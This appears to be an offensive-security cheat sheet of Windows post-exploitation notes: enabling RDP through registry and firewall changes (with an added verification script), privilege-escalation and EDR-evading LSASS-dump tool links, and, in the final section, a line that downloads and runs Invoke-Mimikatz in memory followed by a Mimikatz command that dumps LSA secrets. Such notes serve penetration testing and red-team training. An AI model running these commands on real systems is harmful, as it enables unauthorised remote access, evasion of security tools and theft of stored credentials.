Random Notes:
- Testing for Constrained Language Mode (CLM); returns FullLanguage or ConstrainedLanguage (NoLanguage/RestrictedLanguage are also possible):
$ExecutionContext.SessionState.LanguageMode
- Enable RDP and allow it through the firewall (needs an elevated shell):
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- netsh firewall set service type = remotedesktop mode = enable (legacy "netsh firewall" context; deprecated since Vista/2008 and removed from recent Windows builds, use "netsh advfirewall" or the NetSecurity cmdlets there)
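The same procedure as a single PowerShell script that also verifies the result. This is an added example, not part of the original notes; it assumes an elevated session on Windows 8 / Server 2012 or later (where the NetSecurity and NetTCPIP modules exist) and an English-locale firewall rule group name.

```powershell
# Added example (not from the original notes): enable RDP, open the firewall
# for it, start the service, then verify. Run from an elevated session.
# Assumption: Windows 8 / Server 2012 or later (NetSecurity + NetTCPIP modules).

$tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

# 1. Allow Terminal Services connections (same value the reg add line sets).
Set-ItemProperty -Path $tsKey -Name fDenyTSConnections -Value 0 -Type DWord

# 2. Allow RDP through Windows Firewall. Prefer the NetSecurity cmdlet; fall
#    back to the modern netsh context on hosts without it. Both replace the
#    legacy "netsh firewall set service type = remotedesktop" line.
if (Get-Command Enable-NetFirewallRule -ErrorAction SilentlyContinue) {
    Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'
} else {
    netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
}

# 3. Make sure the Remote Desktop service is up (no-op if already running).
Start-Service -Name TermService

# 4. Verify: registry value, a listener on 3389 and enabled RDP rules.
$deny      = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections).fDenyTSConnections
$listening = Get-NetTCPConnection -LocalPort 3389 -State Listen -ErrorAction SilentlyContinue
$rules     = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue |
             Where-Object { $_.Enabled -eq 'True' }

[pscustomobject]@{
    fDenyTSConnections = $deny              # expect 0
    ListeningOn3389    = [bool]$listening   # expect True
    EnabledRdpRules    = @($rules).Count    # expect > 0
}
```

On a non-English Windows the display group is localized; the locale-independent form is the resource string, e.g. `Enable-NetFirewallRule -Group '@FirewallAPI.dll,-28752'`. Also remember that if the host requires Network Level Authentication you still need a valid password (not just a hash) to get past the RDP logon.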
Local Privilege Escalation:
Cheatsheet Resources:
- https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
Dumping Credentials:
Bypassing PPL:
- https://github.com/itm4n/PPLdump
- https://github.com/RedCursorSecurityConsulting/PPLKiller
Dumping LSASS while bypassing AV/EDR:
- https://github.com/outflanknl/Dumpert
Mimikatz:
- https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz
- iex (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
- Invoke-Mimikatz -Command '"token::elevate" "lsadump::secrets"'